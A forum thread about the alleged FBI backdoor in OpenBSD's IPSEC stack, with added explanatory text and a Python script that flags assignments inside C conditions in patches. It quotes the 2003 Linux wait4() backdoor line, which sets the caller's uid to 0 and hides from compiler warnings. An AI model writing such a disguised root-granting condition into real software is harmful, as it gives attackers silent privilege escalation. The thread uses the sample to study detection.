FBI Alleged To Have Backdoored OpenBSD's IPSEC Stack

Who can tell you that no FreeBSD guys have done the same thing?
The Linux ones? NetBSD?
The only non-affected system could be, err, Plan 9, just because of its popularity :)
 
One of the great selling points of open source software is that the code is public; it's viewed, reviewed, and audited by any number of persons, and theoretically such a backdoor couldn't conceivably exist (for 10 years!). My guess is Theo panicked by writing such an email. Or did he? I'd have expected a GPG-signed email. Anyway, the burden is probably on the OpenBSD team to prove their product is secure by default, not on those being accused. Loss of confidence in any cryptographic algorithm could have really bad consequences worldwide.
 
It's not confirmed yet by the OpenBSD maintainers, but they are still in the process of auditing the IPSEC stack. You can check the IPSEC stack here: http://bit.ly/dSs4vV. Based on that email, the location is in the stack vector; the FreeBSD stack vector is here: http://bit.ly/dUTiiu, and it seems that those sources are different. But that's only based on the email, which says that the backdoor is in the IPSEC stack.
 
qsecofr said:
My guess is Theo panicked by writing such an email.

I doubt that very much. He probably wrote the e-mail because he knew that if he didn't, and someone came forward publicly, making those same claims, and saying that they had already notified Theo, everyone would accuse him of trying to cover it up.

Adam
 
Exactly. Treat it like 'any other bug' and fess up. Simple as that.
 
nekoexmachina said:
And could be obfuscated enough to put there some code you would not want to run.

Not to belabor this point too much, but it's exactly right. Even Bourne shell scripts can be obfuscated to the extent that they're almost impossible for a human to interpret. (Seriously - I've inherited some wonderful examples.) Imagine the type of crud you can mask in complex C code.
 
anomie said:
Not to belabor this point too much, but it's exactly right. Even Bourne shell scripts can be obfuscated to the extent that they're almost impossible for a human to interpret. (Seriously - I've inherited some wonderful examples.) Imagine the type of crud you can mask in complex C code.

Yeah, I've seen an sh script (and a howto, for that matter [don't have the link any more]) that was obscured asm code.
 
qsecofr said:
One of the great selling points of open source software is that the code is public, it's viewed, reviewed, and audited by any number of persons
It CAN be audited, but...
For example, this Linux backdoor attempt was almost done in 2003. This patch was dropped because of a signature mismatch, but what if a committer can approve this?
Code:
+       if ((options == (__WCLONE|__WALL)) && (current->uid = 0))
+                       retval = -EINVAL;
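Review bot: `(current->uid = 0)` in the second clause of the condition is an assignment, not a comparison: it sets the calling process's uid to 0 (root) as a side effect, evaluates to 0 (false), and so `retval = -EINVAL` is never reached. The intended comparison is `current->uid == 0`. Note also that the extra parentheses around the assignment are exactly what silences gcc's -Wparentheses "assignment used as truth value" warning, so a compiler build would not have caught this; a reviewer reading the condition for intent, or a lint that flags a lone `=` inside an `if`, is what catches it.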
This is a backdoor, and it differs from normal code by 1 byte. Sure, it can be viewed, reviewed, and audited by any number of persons, but...
 
I may have an interpretation of "audit" that is all my own then. :) I'd like to think that not only is the code audited for bugs, but it is audited for achieving its purpose.

Not to say that mistakes can't be made. It's the nature of the business. In which case find/fix/patch followed by a security advisory seems appropriate. Once proven found, that is.

Dishonesty among committers seems more an organizational & operational issue. More stringent auditing might help deter that.

Regarding the original external link, I still think it's OpenBSD's responsibility to protect their brand. The suggestion that the accused should somehow prove their innocence seems an abdication of responsibility in my opinion. In my ignorance I don't really know if Theo represents the OpenBSD team in any capacity. But if so, I'd suggest PGP-signed emails if sent as official communications of the group.

Trust will probably become one of the big issues in IT. If it isn't already. I mean with all the spam, I don't even trust emails from my own mother unless they're PGP-signed. :)
 
Report of FBI back door roils OpenBSD community.

Hello everyone.

First of all wish you a Merry Christmas and a Happy New Year.

A couple of days ago I came across this news in a forum, Informatica, and I threw my hands up in despair. :(:(:(:(

Source: http://news.cnet.com/8301-31921_3-20025767-281.html?tag=topStories1

OpenBSD (an open source operating system with backdoors).
I know that OpenBSD and FreeBSD are not the same, but ...
What do you think about it?
Would something similar be possible in FreeBSD?
Is there no one to monitor the source code?

Thanks for your time.

Bye bye.

P.S. This presupposes the truth of the assertion that those backdoors exist.
 
bes said:
Gregory Perry - John Young correspondence published on Cryptome.org


Wow that post was a trip. Especially this link: http://mickey.lucifier.net/b4ckd00r.html . That is the exact stuff conspiracy theories are made of. Where is the tin-foil hat smilie? An OpenBSD hacker was talking about intelligence agents from the Navy and FBI telling him to keep his mouth shut over OpenBSD. This stuff has been going on since early '90s! Incredible.

Well obviously there are "feds in your systems."

Privacy is important. Also, catching tourists is important too, but citizens' civil (and human) right to privacy is of higher priority than catching tourists.

Firstly, I say we use the nature of open source software to uproot them from our systems. We need to do a full code audit of the secure kernel.

Secondly, strict coding and format rules should be devised so as to prevent the insertion of obfuscated code. Coding standards exist for most free software projects today, but this special set of rules would be structured in such a way as to highlight "devious and obfuscated code", or code that does not make it obvious what it is doing.

Thirdly, we have a "chieftain" or "a roundtable of chieftains" that are switched yearly to review each and every piece of code on a certain part of the system: core of the kernel, networking, IPSEC stuff, etc. Debates, investigations, and discussions will be had before any suspected code is let loose.

Fourthly, I say a website be created that scrolls recently added code on a screen for at least 3 months. Then each day, a piece of code is picked from the screen and inspected for nefariousness.

Fifthly, create a code auditing suite of analysis apps that find obfuscated code, or code that is suspected of being obfuscated. Data analysis is being applied to everything today. Why not apply it to some C files?
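The 2003 wait4() change quoted earlier in this thread (a lone `=` where `==` was meant) and the "code auditing suite" proposed above both come down to the same kind of check: a tool that reads incoming patch lines and flags an assignment inside an if/while condition for a human to look at. The script below is an added example, not code from this thread or from any BSD or Linux project. The sample hunk is constructed: its first two added lines reproduce the two lines quoted above, and the `audit_root_wait` line and surrounding context are made up for the demonstration.

```python
import re
from typing import List, Tuple

# Constructed sample hunk. The first two '+' lines are the 2003 change quoted
# in this thread; the remaining lines are invented context for the example.
SAMPLE_HUNK = """\
@@ -1,6 +1,8 @@
        if (options & ~(WNOHANG|WUNTRACED|__WNOTHREAD|__WCLONE|__WALL))
                return -EINVAL;
+       if ((options == (__WCLONE|__WALL)) && (current->uid = 0))
+                       retval = -EINVAL;
+       if (current->uid == 0)
+               audit_root_wait(pid);
        retval = 0;
"""

# A single '=' that is not part of '==', '!=', '<=', '>=' and is not the tail of
# a compound assignment operator (+=, -=, &=, |=, <<=, ...).
ASSIGN_RE = re.compile(r"(?<![=!<>+\-*/%&|^])=(?!=)")

# An if/while whose condition runs to the end of the line.
COND_RE = re.compile(r"\b(if|while)\s*\((.*)\)\s*$")


def flag_assignment_in_condition(hunk: str) -> List[Tuple[int, str]]:
    """Return (line number within the hunk, stripped source line) for every
    added or context line whose if/while condition contains a bare '='.

    Removed lines ('-') and hunk headers ('@@') are skipped: only code that
    will exist after the patch is applied is of interest to the reviewer.
    """
    hits = []
    for lineno, raw in enumerate(hunk.splitlines(), start=1):
        if raw.startswith(("@@", "-")):
            continue
        # Drop the one-character diff prefix ('+' or ' ') to get the C source.
        line = raw[1:] if raw[:1] in "+ " else raw
        m = COND_RE.search(line)
        if m and ASSIGN_RE.search(m.group(2)):
            hits.append((lineno, line.strip()))
    return hits


if __name__ == "__main__":
    for lineno, line in flag_assignment_in_condition(SAMPLE_HUNK):
        print(f"hunk line {lineno}: assignment inside condition: {line}")
```

The check is deliberately noisy: the common C idiom `if ((p = malloc(n)) != NULL)` is flagged as well, which is the point of a review prompt rather than a verdict. It catches the quoted 2003 line precisely because the extra parentheses that hide it from the compiler's warning do not hide it from a pattern match on the condition text, while the legitimate `current->uid == 0` comparison on the next line is not reported.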
 
Alt said:
lockfile, this will not help against the FBI. They are way more powerful than you can imagine..

Yes you are right. The FBI should be looking out for Americans' interests, not suppressing them.

I recently read that your PM Putin just ordered the government to put critical systems on Linux. I was surprised to hear that they were not already! That is good news.
 